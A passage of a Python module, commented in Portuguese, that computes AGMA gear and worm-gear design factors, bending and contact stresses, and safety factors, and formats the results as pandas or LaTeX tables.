\r\n r_s0 = r_n0 + a_0 + x_0 - rho_a0\r\n \r\n \r\n self.r_n0 = r_n0\r\n self.a_0 = a_0\r\n self.b_0 = b_0\r\n self.r_s0 = r_s0\r\n self.r_nb0 = r_nb0\r\n self.s_n0 = s_n0 \r\n \r\n \r\n \"Angulos de Geração\"\r\n inv_phi_n = np.tan(phi_n) - phi_n\r\n \r\n inv_phi_np = inv_phi_n + s_n/(2*r_v)\r\n \r\n phi_nL = tan_phi_nW - inv_phi_np\r\n \r\n r_nL = r_bv/np.cos(phi_nL)\r\n\r\n phi_ns = np.arccos(r_nb0/r_s0)\r\n \r\n inv_phi_np0 = inv_phi_n + s_n0/(2*r_n0)\r\n \r\n inv_phi_ns = np.tan(phi_ns)-phi_ns\r\n \r\n lambd = 2*(inv_phi_np0-inv_phi_ns-rho_a0/r_nb0)\r\n \r\n inv_phi_line = inv_phi_n + (2*(x_g+x_0)*np.tan(phi_n))/(N_v+N_0)\r\n phi_ni = (3*inv_phi_line)**0.33\r\n\r\n for i in range(10):\r\n phi_line = phi_ni + (inv_phi_line+phi_ni-np.tan(phi_ni))/(np.tan(phi_ni)**2)\r\n phi_ni = phi_line\r\n \r\n r_n_line = r_v*np.cos(phi_n)/np.cos(phi_line)\r\n r_n0_line = r_n0*np.cos(phi_n)/np.cos(phi_line)\r\n \r\n \r\n \"Curva de lewis\"\r\n \r\n alpha_i = np.pi/2\r\n y = 1\r\n \r\n alpha_counter = 0\r\n max_it = 15\r\n convergence_flag = 0\r\n while abs(y) > 1e-3 and alpha_counter<=max_it:\r\n \r\n mu_n0 = np.arccos(r_n0_line*np.cos(alpha_i)/r_s0)-alpha_i\r\n \r\n K_S = r_n0_line*np.sin(alpha_i) - r_s0*np.sin(alpha_i+mu_n0)\r\n \r\n K_F = K_S - rho_a0\r\n \r\n theta_n0 = mu_n0 - lambd/2 + np.pi/N_0\r\n \r\n theta_n = N_0/N_v*theta_n0\r\n \r\n beta_n = alpha_i - theta_n\r\n \r\n xi_nF = r_n_line*np.sin(theta_n)+K_F*np.cos(beta_n)\r\n \r\n eta_nF = r_n_line*np.cos(theta_n)+K_F*np.sin(beta_n)\r\n \r\n #Altura da curva de Lewis\r\n h_f = r_nL - eta_nF\r\n \r\n y = 2*h_f*np.tan(beta_n) - xi_nF\r\n y_line = (2*h_f/(np.cos(beta_n)**2) - K_F*np.sin(beta_n)\r\n +N_0/N_v*((r_n0_line*np.sin(alpha_i)/(r_s0*np.sin(alpha_i+mu_n0)))-1)\r\n *(2*xi_nF*np.tan(beta_n)-eta_nF-(2*h_f)/np.cos(beta_n)**2)\r\n -r_n0_line*(np.cos(alpha_i)-np.sin(alpha_i)/np.tan(alpha_i+mu_n0))\r\n *((1+np.sin(beta_n)**2)/np.cos(beta_n))) \r\n \r\n alpha = alpha_i - y/y_line\r\n alpha_i = alpha\r\n alpha_counter +=1\r\n \r\n if alpha_counter >= max_it-1:\r\n #print('Erro de Convergência para Alpha!!')\r\n convergence_flag = 1\r\n\r\n \r\n #raio de adoçamento mínimo\r\n rho_min = (rho_a0 + \r\n ((r_n0_line-r_s0)**2)/\r\n (r_n_line*r_n0_line/\r\n (r_n_line+r_n0_line)-(r_n0_line-r_s0)))\r\n\r\n \r\n #Fator helicoidal\r\n if psi!=0 and m_F>1:\r\n omega = np.rad2deg(np.arctan(np.tan(psi)*np.sin(phi_n)))\r\n C_h = 1/(1-((omega/100)*(1-omega/100)))**0.5\r\n else:\r\n C_h = 1\r\n \r\n #Espessura crítica da curva de Lewis\r\n s_f = abs(2*xi_nF)\r\n\r\n \r\n #Fator de Forma:\r\n H = 0.331-0.436*phi_n\r\n L = 0.324-0.492*phi_n\r\n M = 0.261+0.545*phi_n\r\n\r\n \r\n K_f = H +((s_f/rho_min)**L)*((s_f/h_f)**M)\r\n\r\n #Fator de ANgulo de Hélice\r\n if psi!=0 and m_F>1:\r\n K_psi = np.cos(psi_r)*np.cos(psi) \r\n else:\r\n K_psi = 1\r\n \r\n #Fator Y:\r\n Y = K_psi/((np.cos(phi_nL)/np.cos(phi_nr))\r\n *((6*h_f/(s_f**2*C_h))-np.tan(phi_nL)/s_f))\r\n \r\n\r\n #Fator de Forma:\r\n J = (Y*C_psi/(K_f*m_N))\r\n \r\n \r\n \"Fator Dinâmico K_v\"\r\n \r\n V = abs(np.pi*n_i*(r_n/P)/6)\r\n B = 0.25*(12-Q_v)**(2/3)\r\n A = 50+56*(1-B)\r\n \r\n K_v = ((A+np.sqrt(V))/A)**B\r\n \r\n V_max = (A + (Q_v - 3))**2\r\n \r\n \r\n \"Fator de Tamanho\"\r\n\r\n F = F/P\r\n \r\n u = ((s_f/P)**2)/(4*h_f/P)\r\n Y_lewis = 2*u*P/3\r\n \r\n #Shigley:\r\n K_s = 1.192*((F*Y_lewis**0.5)/P)**0.0535\r\n \r\n #AGMA\r\n if K_s < 1:\r\n K_s = 1\r\n\r\n self.C_1v[tag] = C_1v\r\n self.C_4v[tag] = C_4v\r\n self.C_6v[tag] = C_6v\r\n self.m_p[tag] = m_p\r\n self.tan_phi_nW[tag] = tan_phi_nW\r\n self.r_bv[tag] = r_bv\r\n self.phi_nL[tag] = phi_nL\r\n self.phi_line[tag] = phi_line\r\n self.phi_n[tag] = phi_n\r\n self.phi_ni[tag] = phi_ni\r\n self.phi_ns[tag] = phi_ns\r\n self.lambda_nF[tag] = lambd\r\n self.alpha[tag] = alpha\r\n self.mu_n0[tag] = mu_n0\r\n self.r_nL[tag] = r_nL\r\n self.r_n_line[tag] = r_n_line\r\n self.r_n0_line[tag] = r_n0_line\r\n self.lambd[tag] = lambd\r\n self.theta_n0[tag] = theta_n0\r\n self.theta_n[tag] = theta_n\r\n self.beta_n[tag] = beta_n\r\n self.eta_nF[tag] = eta_nF\r\n self.xi_nF[tag] = xi_nF\r\n self.h_f[tag] = h_f\r\n self.K_F[tag] = K_F\r\n self.K_S[tag] = K_S\r\n self.convergence_flag[tag] = convergence_flag \r\n self.rho_min[tag] = rho_min\r\n self.s_f[tag] = s_f\r\n self.H[tag] = H\r\n self.L[tag] = L\r\n self.M[tag] = M\r\n self.K_f[tag] = K_f\r\n self.Y[tag] = Y\r\n self.J[tag] = J\r\n self.K_v[tag] = K_v\r\n self.V[tag] = V\r\n self.V_max[tag] = V_max\r\n self.Y_lewis[tag] = Y_lewis\r\n self.K_s[tag] = K_s\r\n \r\n \r\n \"Fator de Condição de Superfície\"\r\n if detrimento_superficie == True:\r\n C_f = 1.5\r\n else:\r\n C_f = 1\r\n \r\n self.C_f = C_f\r\n \r\n \"Fator de Distribuição de Carga K_m\"\r\n lookup = {1:'aberto',\r\n 2:'fechado comercial',\r\n 3:'fechado preciso',\r\n 4:'fechado extra-preciso'\r\n }\r\n \r\n if type(engrenamento) is int:\r\n engrenamento = lookup[engrenamento]\r\n \r\n condition = ((F/(2*r_n/P)) <= 2) and (F <= 40)\r\n\r\n if condition == True:\r\n C_mc = 1 if coroamento == False else 0.8\r\n C_pf = (F/(10*2*r_n/P) - 0.025 if F <= 1\r\n else F/(10*2*r_n/P) - 0.0375 + 0.0125*F if F<= 17 \r\n else F/(10*2*r_n/P) - 0.1109 + 0.0207*F - 0.00338* F**2)\r\n C_pm = 1 #ALTERAR PARA A PARTE 2\r\n C_ma_dic = {'aberto' : [0.247,0.0167,-0.765e-4],\r\n 'fechado comercial' : [0.127,0.0158,-0.930e-4],\r\n 'fechado preciso' : [0.0675,0.0128,-0.926e-4],\r\n 'fechado extra-preciso' : [0.00360,0.0102,-0.822e-4]}\r\n A = C_ma_dic[engrenamento.lower()][0]\r\n B = C_ma_dic[engrenamento.lower()][1]\r\n C = C_ma_dic[engrenamento.lower()][2] \r\n C_ma = A+B*F+C*F**2\r\n C_e = 0.8 if montagem_ajustada else 1\r\n\r\n K_m = 1+C_mc*(C_pf*C_pm+C_ma*C_e)\r\n \r\n else:\r\n K_m = 1\r\n \r\n \r\n self.K_m = K_m\r\n \r\n \"Fator de Razaõ de Dureza\"\r\n if m_g >= 1:\r\n C_H = 1\r\n \r\n \r\n elif 1/(H_Bp/H_Bg) >= 1.2: \r\n if 1/(H_Bp/H_Bg) > 1.7:\r\n A_line = 0.00698\r\n else:\r\n A_line = (9.98e-3*(H_Bp/H_Bg)-8.29e-3)\r\n C_H = 1 + A_line*(1/m_g - 1)\r\n \r\n else:\r\n C_H = 1\r\n \r\n self.C_H = C_H\r\n \r\n \"Fator de Sobrecarga\"\r\n over_dic = {'uniforme': {'uniforme': 1,\r\n 'leve': 1.25,\r\n 'intenso': 1.75},\r\n 'leve' : {'uniforme': 1.25,\r\n 'leve': 1.5,\r\n 'intenso': 2},\r\n 'medio': {'uniforme': 1.5,\r\n 'leve': 1.5,\r\n 'intenso': 2.25}}\r\n \r\n pot_key = fonte_potencia.lower().replace('é','e')\r\n machine_key = choque_maquina.lower().replace('é','e')\r\n \r\n if len(pot_key.split())>1:\r\n pot_key = pot_key.split()[1]\r\n \r\n if len(machine_key.split())>1:\r\n machine_key = machine_key.split()[1]\r\n \r\n K_0 = over_dic[pot_key][machine_key]\r\n \r\n self.K_0 = K_0\r\n \r\n \"Fatores de Ciclagem de Tensão\"\r\n \r\n #Y_N\r\n Y_N = {}\r\n \r\n if N_cyc < 3e6:\r\n if tratamento.lower() == 'nitretado':\r\n Y_N['pinnion'] = 4.9404*N_cyc**-0.1045\r\n elif tratamento.lower()[0:11] == 'carbonetado':\r\n Y_N['pinnion'] = 6.1514*N_cyc**-0.1192\r\n elif abs(H_Bp-160) < abs(H_Bp-250) and abs(H_Bp-160) < abs(H_Bp-400):\r\n Y_N['pinnion'] = 2.3194*N_cyc**-0.0538\r\n elif abs(H_Bp-250) < abs(H_Bp-160) and abs(H_Bp-250) < abs(H_Bp-400):\r\n Y_N['pinnion'] = 4.9404*N_cyc**-0.1045\r\n else:\r\n Y_N['pinnion'] = 9.4518*N_cyc**-0.148\r\n else:\r\n Y_N['pinnion'] = 1.3558*N_cyc**-0.0178 #Mais conservadora\r\n \r\n if N_cyc < 3e6:\r\n if tratamento.lower() == 'nitretado':\r\n Y_N['gear'] = 4.9404*N_cyc**-0.1045\r\n elif tratamento.lower()[0:11] == 'carbonetado':\r\n Y_N['gear'] = 6.1514*N_cyc**-0.1192\r\n elif abs(H_Bg-160) < abs(H_Bg-250) and abs(H_Bg-160) < abs(H_Bg-400):\r\n Y_N['gear'] = 2.3194*N_cyc**-0.0538\r\n elif abs(H_Bg-250) < abs(H_Bg-160) and abs(H_Bg-250) < abs(H_Bg-400):\r\n Y_N['gear'] = 4.9404*N_cyc**-0.1045\r\n else:\r\n Y_N['gear'] = 9.4518*N_cyc**-0.148\r\n else:\r\n Y_N['gear'] = 1.3558*N_cyc**-0.0178 #Mais conservadora\r\n \r\n \r\n self.Y_N = Y_N\r\n \r\n #Z_N\r\n if N_cyc < 1e7:\r\n if tratamento.lower() == 'nitretado':\r\n Z_N = 1.249*N_cyc**-0.0138\r\n else:\r\n Z_N = 2.466*N_cyc**-0.056\r\n else:\r\n Z_N = 1.4488*N_cyc**-0.023 #Mais conservadora\r\n \r\n self.Z_N = Z_N\r\n \r\n \"Coeficiente Elástico C_p\"\r\n \r\n C_p = np.sqrt(1/(np.pi*((1-poisson_p**2)/(self.E_p)+(1-poisson_g**2)/(self.E_g))))\r\n \r\n self.C_p = C_p \r\n \r\n \"Fator de Confiabilidade\"\r\n \r\n if trust == 99.99:\r\n K_r = 1.5\r\n elif trust == 99.9:\r\n K_r = 1.25\r\n elif trust == 99:\r\n K_r = 1\r\n elif trust == 90:\r\n K_r = 0.85\r\n elif trust > 50 and trust <99:\r\n K_r = 0.658-0.0759*np.log(1-trust/100)\r\n elif trust > 99:\r\n K_r = 0.5-0.109*np.log(1-trust/100)\r\n else:\r\n print('Confiabilidade Muito Baixa!!!')\r\n \r\n self.K_r = K_r\r\n \r\n \"Fator de Temperatura\"\r\n if temperatura <= 120:\r\n K_T = 1\r\n else:\r\n K_T = 1.5\r\n \r\n self.K_T = K_T\r\n \r\n \"Espessura de Aro\"\r\n self.K_B = 1\r\n \r\n def bending_stress_g(self,W_t):\r\n \"\"\"\r\n Tensão de flexão na coroa\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['gear']\r\n K_s = self.K_s['gear']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n K_B = self.K_B\r\n J =self.J['gear']\r\n sigma = W_t*K_0*K_v*K_s*(P/F)*(K_m*K_B/J)\r\n return sigma\r\n \r\n def bending_stress_p(self,W_t):\r\n \"\"\"\r\n Tensão de flexão no pinhão\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['pinnion']\r\n K_s = self.K_s['pinnion']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n K_B = self.K_B\r\n J =self.J['pinnion']\r\n sigma = W_t*K_0*K_v*K_s*(P/F)*(K_m*K_B/J)\r\n return sigma\r\n \r\n \r\n def contact_stress_g(self,W_t):\r\n \"\"\"\r\n Tensão de contato na coroa\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['gear']\r\n K_s = self.K_s['gear']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n C_p = self.C_p\r\n C_f = self.C_f\r\n r_p = self.r_n/P\r\n I =self.I\r\n sigma = C_p*(W_t*K_0*K_v*K_s*(K_m/(2*r_p*F))*(C_f/I))**0.5\r\n return sigma\r\n \r\n def contact_stress_p(self,W_t):\r\n \"\"\"\r\n Tensão de contato no pinhão\r\n\r\n Parameters\r\n ----------\r\n W_t : float\r\n Carga transversal em N.\r\n\r\n Returns\r\n -------\r\n sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n K_0 = self.K_0\r\n K_v = self.K_v['pinnion']\r\n K_s = self.K_s['pinnion']\r\n P = self.P\r\n F = self.F\r\n K_m =self.K_m\r\n C_p = self.C_p\r\n C_f = self.C_f\r\n r_p = self.r_n/P\r\n I =self.I\r\n sigma = C_p*(W_t*K_0*K_v*K_s*(K_m/(2*r_p*F))*(C_f/I))**0.5\r\n return sigma\r\n \r\n def max_bending_g(self,S_t,S_F):\r\n \"\"\"\r\n Máxima tensão de flexão na coroa\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência à flexão.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['gear']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_t/S_F)*Y_N/(K_T*K_r)\r\n return max_sigma\r\n \r\n def max_bending_p(self,S_t,S_F):\r\n \"\"\"\r\n Máxima tensão de flexão admissível no pinhão\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência à flexão.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['pinnion']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_t/S_F)*Y_N/(K_T*K_r)\r\n return max_sigma\r\n \r\n def max_contact_g(self,S_c,S_F):\r\n \"\"\"\r\n Máxima tensão de contato admissível na coroa\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência ao contato.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = self.C_H\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_c/S_F)*(Z_N*C_H)/(K_T*K_r)\r\n return max_sigma\r\n \r\n def max_contact_p(self,S_c,S_F):\r\n \"\"\"\r\n Máxima tensão de contato admissível no pinhão\r\n\r\n Parameters\r\n ----------\r\n S_t : float\r\n Limite de resistência ao contato.\r\n S_F :float\r\n Fator de segurança.\r\n\r\n Returns\r\n -------\r\n max_sigma : float\r\n Tensão em Pa.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = 1\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n max_sigma = (S_c/S_F)*(Z_N*C_H)/(K_T*K_r)\r\n return max_sigma\r\n \r\n def safety_bending_g(self,S_t,W_t):\r\n \"\"\"\r\n Fator de segurança\r\n\r\n Parameters\r\n ----------\r\n S_t : Float\r\n Tensão máxima de flexão admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança a Flexão da Coroa.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['gear']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma = self.bending_stress_g(W_t)\r\n S_F = ((S_t*Y_N)/(K_T*K_r))/sigma\r\n return S_F\r\n\r\n def safety_bending_p(self,S_t,W_t):\r\n \"\"\"\r\n\r\n Parameters\r\n ----------\r\n S_t : Float\r\n Tensão máxima de flexão admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança a Flexão do Pinhão.\r\n\r\n \"\"\"\r\n Y_N = self.Y_N['pinnion']\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma = self.bending_stress_p(W_t)\r\n S_F = ((S_t*Y_N)/(K_T*K_r))/sigma\r\n return S_F\r\n \r\n def safety_contact_g(self,S_c,W_t):\r\n \"\"\"\r\n\r\n Parameters\r\n ----------\r\n S_c : Float\r\n Tensão máxima de contato admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança ao Contato da Coroa.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = self.C_H\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma_c = self.contact_stress_g(W_t)\r\n S_F = ((S_c*Z_N*C_H)/(K_T*K_r))/sigma_c\r\n return S_F\r\n \r\n def safety_contact_p(self,S_c,W_t):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n S_c : Float\r\n Tensão máxima de contato admissível em MPa.\r\n W_t : float\r\n Carga transversal no dente em N.\r\n\r\n Returns\r\n -------\r\n S_F : float\r\n Fator de Segurança ao Contato do Pinhão.\r\n\r\n \"\"\"\r\n Z_N = self.Z_N\r\n C_H = 1\r\n K_T = self.K_T\r\n K_r = self.K_r\r\n sigma_c = self.contact_stress_p(W_t)\r\n S_F = ((S_c*Z_N*C_H)/(K_T*K_r))/sigma_c\r\n return S_F\r\n \r\n def report_agma(self,precision=2,latex=False):\r\n params_dict = {'Parâmetros':['J',\r\n 'I',\r\n 's_f',\r\n 'h_f',\r\n 'Y',\r\n 'K_s',\r\n 'K_v',\r\n 'K_0',\r\n 'K_m',\r\n 'C_p',\r\n 'C_f',\r\n 'K_T',\r\n 'K_r',\r\n 'C_H',\r\n 'Z_N',\r\n 'Y_l',\r\n 'K_B'],\r\n 'Pinhão':[f'{self.J[\"pinnion\"]:.{precision}f}',\r\n f'{self.I:.{precision}f}',\r\n f'{self.s_f[\"pinnion\"]:.{precision}f}',\r\n f'{self.h_f[\"pinnion\"]:.{precision}f}',\r\n f'{self.Y[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_s[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_v[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_0:.{precision}f}',\r\n f'{self.K_m:.{precision}f}',\r\n f'{self.C_p:.{precision}f}',\r\n f'{self.C_f:.{precision}f}',\r\n f'{self.K_T:.{precision}f}',\r\n f'{self.K_r:.{precision}f}',\r\n f'{self.C_H:.{precision}f}',\r\n f'{self.Z_N:.{precision}f}',\r\n f'{self.Y_lewis[\"pinnion\"]:.{precision}f}',\r\n f'{self.K_B:.{precision}f}'],\r\n 'Coroa':[f'{self.J[\"gear\"]:.{precision}f}',\r\n f'{self.I:.{precision}f}',\r\n f'{self.s_f[\"gear\"]:.{precision}f}',\r\n f'{self.h_f[\"gear\"]:.{precision}f}',\r\n f'{self.Y[\"gear\"]:.{precision}f}',\r\n f'{self.K_s[\"gear\"]:.{precision}f}',\r\n f'{self.K_v[\"gear\"]:.{precision}f}',\r\n f'{self.K_0:.{precision}f}',\r\n f'{self.K_m:.{precision}f}',\r\n f'{self.C_p:.{precision}f}',\r\n f'{self.C_f:.{precision}f}',\r\n f'{self.K_T:.{precision}f}',\r\n f'{self.K_r:.{precision}f}',\r\n f'{self.C_H:.{precision}f}',\r\n f'{self.Z_N:.{precision}f}',\r\n f'{self.Y_lewis[\"gear\"]:.{precision}f}',\r\n f'{self.K_B:.{precision}f}'],\r\n }\r\n \r\n params_dt = pd.DataFrame.from_dict(params_dict)\r\n \r\n if latex:\r\n return params_dt.to_latex(index=False,\r\n formatters={'Parâmetros':lambda x: f'${x}$',\r\n 'Pinhão': lambda x: f'{x.replace(\".\",\",\")}',\r\n 'Coroa': lambda x: f'{x.replace(\".\",\",\")}'\r\n },\r\n escape=False)\r\n \r\n else:\r\n return params_dt\r\n \r\n def report_stress(self,S_t,S_c,W_t,precision=2,latex=False):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n S_t : TYPE\r\n DESCRIPTION.\r\n S_c : TYPE\r\n DESCRIPTION.\r\n W_t : TYPE\r\n DESCRIPTION.\r\n precision : TYPE, optional\r\n DESCRIPTION. The default is 2.\r\n latex : TYPE, optional\r\n DESCRIPTION. The default is False.\r\n\r\n Returns\r\n -------\r\n params_dt: DataFrame or String\r\n Dataframe com os dados das tensões.\r\n\r\n \"\"\"\r\n \r\n sig_Bp = f'{self.bending_stress_p(W_t):.{precision}f}'\r\n sig_Bg = f'{self.bending_stress_g(W_t):.{precision}f}'\r\n FS_Bp = f'{self.safety_bending_p(S_t, W_t):.{precision}f}'\r\n FS_Bg = f'{self.safety_bending_g(S_t, W_t):.{precision}f}'\r\n \r\n sig_Cp = f'{self.contact_stress_p(W_t):.{precision}f}'\r\n sig_Cg = f'{self.contact_stress_g(W_t):.{precision}f}'\r\n FS_Cp = f'{self.safety_contact_p(S_c, W_t):.{precision}f}'\r\n FS_Cg = f'{self.safety_contact_g(S_c, W_t):.{precision}f}'\r\n\r\n params_dict = {'Parâmetros': ['sigma_B [MPa]',\r\n 'sigma_C [MPa]',\r\n 'FS_B',\r\n 'FS_C'],\r\n 'Pinhão': [sig_Bp,\r\n sig_Cp,\r\n FS_Bp,\r\n FS_Cp],\r\n 'Coroa': [sig_Bg,\r\n sig_Cg,\r\n FS_Bg,\r\n FS_Cg]\r\n }\r\n \r\n params_dt = pd.DataFrame.from_dict(params_dict)\r\n \r\n if latex:\r\n return params_dt.to_latex(index=False,\r\n formatters={'Parâmetros':lambda x: f'${x}$'.replace('sigma','\\sigma'),\r\n 'Pinhão': lambda x: f'{x.replace(\".\",\",\")}',\r\n 'Coroa': lambda x: f'{x.replace(\".\",\",\")}'\r\n },\r\n escape=False)\r\n \r\n else:\r\n return params_dt\r\n \r\n def report_dims(self,precision=2,latex=False):\r\n m = 1/self.P\r\n N_p = self.N_p\r\n N_g = self.N_g\r\n d_p = N_p*m\r\n d_g = N_g*m\r\n F = self.F\r\n \r\n dims_dict = {'Dimensões':['N',\r\n 'd [mm]',\r\n 'm [mm]',\r\n 'F [mm]'],\r\n 'Pinhão': [f'{N_p:.0f}',\r\n f'{d_p:.{precision}f}',\r\n f'{m:.{precision}f}',\r\n f'{F:.{precision}f}'],\r\n 'Coroa': [f'{N_g:.0f}',\r\n f'{d_g:.{precision}f}',\r\n f'{m:.{precision}f}',\r\n f'{F:.{precision}f}'],\r\n }\r\n \r\n \r\n dims_dt = pd.DataFrame.from_dict(dims_dict)\r\n \r\n if latex:\r\n return dims_dt.to_latex(index=False,\r\n formatters={'Dimensões':lambda x: f'${x}$',\r\n 'Pinhão': lambda x: f'{x.replace(\".\",\",\")}',\r\n 'Coroa': lambda x: f'{x.replace(\".\",\",\")}'\r\n },\r\n escape=False)\r\n \r\n else:\r\n return dims_dt\r\n \r\n \r\nclass WormAGMA():\r\n def __init__(self,\r\n nw:float,\r\n dw:float,\r\n dc:float,\r\n Nw:int,\r\n Nc:int,\r\n px:float,\r\n lambd:float,\r\n casting_method:str = 'molde',\r\n **threadkwargs):\r\n \r\n \"\"\"\r\n Define os parâmetros de projeto para dimensionamento de pinhões \r\n sem-fim de acorod com a metodologia da AGMA.\r\n \r\n Parameters\r\n ----------\r\n nw : float\r\n Rotação do pinhão sem-fim em RPM.\r\n dw : float\r\n Diametro nominal do pinhão sem-fim em mm.\r\n dc : float\r\n Diametro nominal da coroa sem-fim em mm.\r\n Nw : int\r\n N° de dentes do pinhão sem-fim em mm.\r\n Nc : int\r\n N° de dentes da coroa sem-fim em mm.\r\n px: float\r\n passo axial do pinhão em mm\r\n lambd : float\r\n Ângulo de avanço em deg.\r\n C : float\r\n Distância entre centros em mm.\r\n casting_method : str\r\n Tipo de fundição utilizado no pinhão.\r\n Opções: molde; resfriamento; centrifugo. O padrão é 'molde'\r\n **threadkwargs: kwargs\r\n Dados de adendo (kw: a) e dedendo (kw: b) e folga (kw: c) do \r\n dente do pinhão. Somente nescessário se px < 4.06 mm. Por \r\n padrão adota os valores padronizados para um angulo de pressão \r\n de 20° de filente único.\r\n \r\n Returns\r\n -------\r\n None.\r\n \r\n \"\"\"\r\n \r\n self.dw,self.dc,self.px,self.C = map(lambda x : m2ft(x,metric_unit='mm',imperial_unit='in'),\r\n [dw,dc,px,(dw+dc)/2]\r\n )\r\n \r\n self.nw = rad_velocity(nw,input_unit='RPM',output_unit='rad/s')\r\n self.lambd=np.deg2rad(lambd)\r\n \r\n self.Nw = Nw\r\n self.Nc = Nc\r\n self.mG = Nc/Nw \r\n \r\n self.Pn = self.Nc/self.dc\r\n self.Pt = self.Pn*np.cos(self.lambd)\r\n \r\n a = threadkwargs.pop('a',0.3183*self.px)\r\n b = threadkwargs.pop('b',0.3683*self.px)\r\n c = threadkwargs.pop('c',b-a)\r\n\r\n do = self.dw+2*a\r\n \r\n \"Largura de Face da Coroa\"\r\n self.Fc = (1.125*np.sqrt((do+2*c)**2-(do-4*a)**2) if px < 0.160\r\n else 2/3*self.dw)\r\n #Não exceder valor máximo:\r\n if self.Fc > 0.67*self.dc:\r\n self.Fc = 0.67*self.dc\r\n \r\n \"Velocidade tangencial\"\r\n self.Vs = 60*(np.pi*self.nw*self.dw/(12*np.cos(self.lambd))) #ft/min\r\n \r\n \"Fator dos Materiais\"\r\n if self.dc <= 3:\r\n Cs = 720+10.37*self.C**3\r\n elif casting_method.lower() == 'molde' or 'mold':\r\n Cs = (1000 if self.dc <= 2.5\r\n else 1190 - 477*np.log10(self.dc)\r\n )\r\n elif casting_method.lower() == 'resfriamento' or 'cooled':\r\n Cs = (1000 if self.dc <= 8\r\n else 1412 - 456*np.log10(self.dc)\r\n )\r\n elif casting_method.replace('í','i').lower() == 'centrifugo' or 'centrifugal':\r\n Cs = (1000 if self.dc <= 25\r\n else 1251 - 180*np.log10(self.dc)\r\n )\r\n \r\n self.Cs = Cs\r\n \r\n \"Fator de correção de razão\"\r\n if self.mG < 3:\r\n print('A razão de engrenamento Nc/Nw deve ser maior que 3. Recebido: {mG:.1f}')\r\n \r\n \r\n self.Cm = (0.02*np.sqrt(-self.mG**2+40*self.mG-76) + 0.46 if 3 < self.mG <= 20\r\n else 0.0107*np.sqrt(-self.mG**2+56*self.mG+5145) if 20 < self.mG <= 76\r\n else 1.1483-0.00658*self.mG)\r\n \r\n \"Fator de velocidade\"\r\n self.Cv = (0.659*np.exp(-0.0011*self.Vs) if self.Vs < 700\r\n else 13.31*self.Vs**(-0.571) if 700 <= self.Vs < 3000\r\n else 65.52*self.Vs**(-0.774)\r\n )\r\n \r\n \r\n def Wadm(self,E=303,unit='N',FS=1.5):\r\n \"\"\"\r\n Calcula a força tangencial admissível no dente da coroa (componente mais crítico)\r\n a partir do método AGMA, corrigido pela razão entre os módulo de elasticidade\r\n do material adotado e a liga de bronze adotada pela AGMA para o dimensionamento\r\n de ssitemas de engrenamento sem-fim.\r\n\r\n Parameters\r\n ----------\r\n \r\n E : float\r\n Módulo de Young do material em MPa. O padrão é 303, idêntico à liga\r\n de aluínio-bronze considerada para os cálculos padrões da AGMA.\r\n unit : str, optional\r\n Define a unidade desejada da força no output. The default is 'N'.\r\n FS : float, optional\r\n Fator de segurança para contabilizar parâmetros não previstos nos \r\n efeitos da mudança de material. The default is 1.5.\r\n\r\n Returns\r\n -------\r\n float\r\n Força tangecial admissível na unidade específicada.\r\n\r\n \"\"\"\r\n E_bronze = 303 #Mpa, modulo de elasticidade de uma liga de bronze-almínimo, utilizada no calculo da AGMA\r\n E_ratio = E/(E_bronze*FS)\r\n \r\n W = self.Cs*(self.dc**0.8)*self.Fc*self.Cm*self.Cv*E_ratio\r\n \r\n \r\n\r\n if unit == 'lbf':\r\n return W\r\n \r\n else:\r\n return lbf2N(W,metric_unit=unit)\r\n \r\n \r\n def get_params(self):\r\n \"\"\"\r\n Gera dicionário com os parâmetros de correção do método AGMA.\r\n\r\n Returns\r\n -------\r\n 